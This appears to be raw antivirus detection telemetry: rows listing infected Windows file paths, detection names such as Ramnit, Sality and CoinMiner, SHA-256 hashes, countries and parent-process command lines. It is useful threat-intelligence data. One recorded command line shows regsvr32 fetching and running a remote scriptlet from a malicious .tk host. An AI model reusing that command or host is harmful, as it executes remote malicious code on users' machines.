  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233638-2f9451a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-233638-2F9451A5', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233634-5e282f0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233634-5E282F0F', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stardock+fences+305+crack.exe', filepath='C:\\Users\\USER\\Downloads\\Stardock+Fences+305+Crack.exe', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M2.#R100322'), hash='0785957c5bffc7c719e8905ecc448ed156a28a37746ae30faa4b5dd0fd362bf8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07aa36d6c2b094ff371d1920aeae35c8fbbcb5dcb82519c3c8b88ad8c8a97282', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\07AA36D6C2B094FF371D1920AEAE35C8FBBCB5DCB82519C3C8B88AD8C8A97282', filesize=1280000, name='TR/Crypt.XPACK.Gen.#M300.#R4071'), hash='07aa36d6c2b094ff371d1920aeae35c8fbbcb5dcb82519c3c8b88ad8c8a97282', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igxpco32.dll', filepath='\\\\?\\C:\\Drivers\\Video\\Intel1\\HD1\\igxpco32.dll', filesize=492000, name='W32/Ramnit.C.#M1.#R1'), hash='07be1f33ce35a1f07cf1bd9107deebf722461178692e36d8ebe6dd926ad29630', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07ca3b6da26ae9c96203cb4d52526cf7b817d596125567563074126417ef6f5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\07CA3B6DA26AE9C96203CB4D52526CF7B817D596125567563074126417EF6F5B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07ca3b6da26ae9c96203cb4d52526cf7b817d596125567563074126417ef6f5b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\15.06.2018-121.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.03.2018-140.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T14:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iddbas32.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\iddbas32.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0815476a461c413fa908b96aa5c2821aeb7b3a2abce3f4f5b118bbe6c514f1d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iddbas32.dll', filepath='C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\iddbas32.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0815476a461c413fa908b96aa5c2821aeb7b3a2abce3f4f5b118bbe6c514f1d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\360se6\\Application\\360se.exe', parentsize=1190912, timestamp='2018-11-02T08:57:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\العاب\\الابطال الخارقون\\سونك 2\\autorun.exe', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='084c65c8650c7dfb95135dc74c9b7e800c9de71aac6a38dffaadefce84798a0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T19:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\العاب\\الابطال الخارقون\\سونك 2\\autorun.exe', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='084c65c8650c7dfb95135dc74c9b7e800c9de71aac6a38dffaadefce84798a0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T02:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:24:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='088a025fe8d60dbfb7599350caf243000f3427f14fe9967bb88d3f8f89a94c31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\088A025FE8D60DBFB7599350CAF243000F3427F14FE9967BB88D3F8F89A94C31', filesize=128000, name='TR/Crypt.XPACK.Gen2.#M300.#R100604'), hash='088a025fe8d60dbfb7599350caf243000f3427f14fe9967bb88d3f8f89a94c31', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213658-4660903d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7c86a7c\\AVSCAN-20181102-212445-0265EB6B\\AVSCAN-20181102-213658-4660903D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='08a157a121fdd722237f4c2d98c1bf5f637716af11250de253bda58eb7d3e651', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='inpaint43-downloader.exe', filepath='L:\\Users\\X\\Downloads\\inpaint43-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='08a157a121fdd722237f4c2d98c1bf5f637716af11250de253bda58eb7d3e651', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-02T17:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T06:02:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='radihe.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\NOFEGU~1\\radihe.exe', filesize=640000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='08e14ee377b465b312b01cd174f003291c3dfd427fa2ae10116bebd176f809c5', metadata=Row(cmdline='\\/Check', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T21:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digreg.exe', filepath='\\?\\K:\\الماس@\\DIGREG.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='08e6f8d08330fe8ca3609a8ba082e350b3351dbfd98cd52e389e7e98f522f6ff', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ftclean.exe', filepath='D:\\CPT\\โปรแกรม PLC Omron\\CXONE V4.1\\drivers\\USB\\7\\CS1W-CIF31\\FTClean.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='08e6f8fed603c8a9c670ca6fa5469ff66e9cf0b06acf666cd9afa5659839558e', metadata=Row(cmdline='\\/start', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\cpe17antiautorun1670.exe', parentsize=225280, timestamp='2018-11-02T03:41:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='08f43c6819129dcd6dddc17bc0ae40fccffa5f9bb20560e3c42e585c18d380c1', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:59:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nvflash.exe', filepath='H:\\ACER\\Acer Z220 Via Flashtool\\Acer_DownloadTool_V20.01\\Tools\\NV\\nv_bin_JB2_17r16\\nvflash.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='08f93d91c3ff4d6f3845c33503e43f62c1ca0284bb2be320c614cf1df356a5ed', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='G:\\01. DATA PROGRAM\\Advan\\SPD_Upgrade_Tool_R2.9.9015\\UpgradeDownload.exe', parentsize=1756160, timestamp='2018-11-02T06:55:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\04510b796795bac8dc3a80c84e7b64ec\\x86_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_6.1.7601.17514_none_1d021a899e3cd8e8\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='0954bc13aa7424b3190bde1b8ef077c6f492f52bb36261b6cd4e2a40b6e190c2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T01:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lmtools.exe', filepath='D:\\安装软件\\官方\\AUTOCAD_2008-64bit官方简体中文版(64位)安装版\\AutoCAD2008-64bit\\support\\nlm\\Program Files\\Autodesk Network License Manager\\lmtools.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='098447b6cbe0e7f59220a452888a9de2947ba7325b363039b38b43db4541b6ad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-02T08:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vfeedingfrenzytwo.exe', filepath='q:\\kabo.aya\\الريشة\\سمكة 2\\vFeedingFrenzyTwo.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='0aaa8926f02b514e4de6a1a7ef37ed5c4757c53d0a98b70f9f827b0a34d15027', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:12:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files (x86)\\Steam\\SteamApps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='0ac4b0f50093a60f4d91af9def8c52e84384940b687730b5575abb9f6f143dbe', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T17:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='0b04977e527ef87bf35911463cf918654ac138a82ceab2aa497f64816c8eac09', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaQyKqDA70uNGHBy.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126096, timestamp='2018-11-02T02:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='0b04977e527ef87bf35911463cf918654ac138a82ceab2aa497f64816c8eac09', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaQyKqDA70uNGHBy.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126096, timestamp='2018-11-02T02:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.vir', filepath='\\\\?\\C:\\ProgramData\\vshub.VIR', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='DO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0b6112c21aae542cc56c191f1626d4a5cb4ce740e9bdecbd7cb638b507eff17b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0B6112C21AAE542CC56C191F1626D4A5CB4CE740E9BDECBD7CB638B507EFF17B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0b6112c21aae542cc56c191f1626d4a5cb4ce740e9bdecbd7cb638b507eff17b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T17:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135146-6d8275f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b70d204\\AVSCAN-20181102-135034-6296D67B\\AVSCAN-20181102-135146-6D8275F0', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T03:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T03:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124211-32b072cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b6a03a9\\AVSCAN-20181102-124137-2D27D6DC\\AVSCAN-20181102-124211-32B072CB', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\/u \\\\\\/n \\\\\\/s \\\\\\/i:http:\\\\\\/\\\\\\/q.112adfdae.tk\\\\\\/kma2.sct scrobj.dll', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\regsvr32.exe', parentsize=14848, timestamp='2018-11-02T11:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T11:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T17:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\2.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T05:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\2.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T05:38:34Z'), dt=datetime.date(2018, 11, 2)),
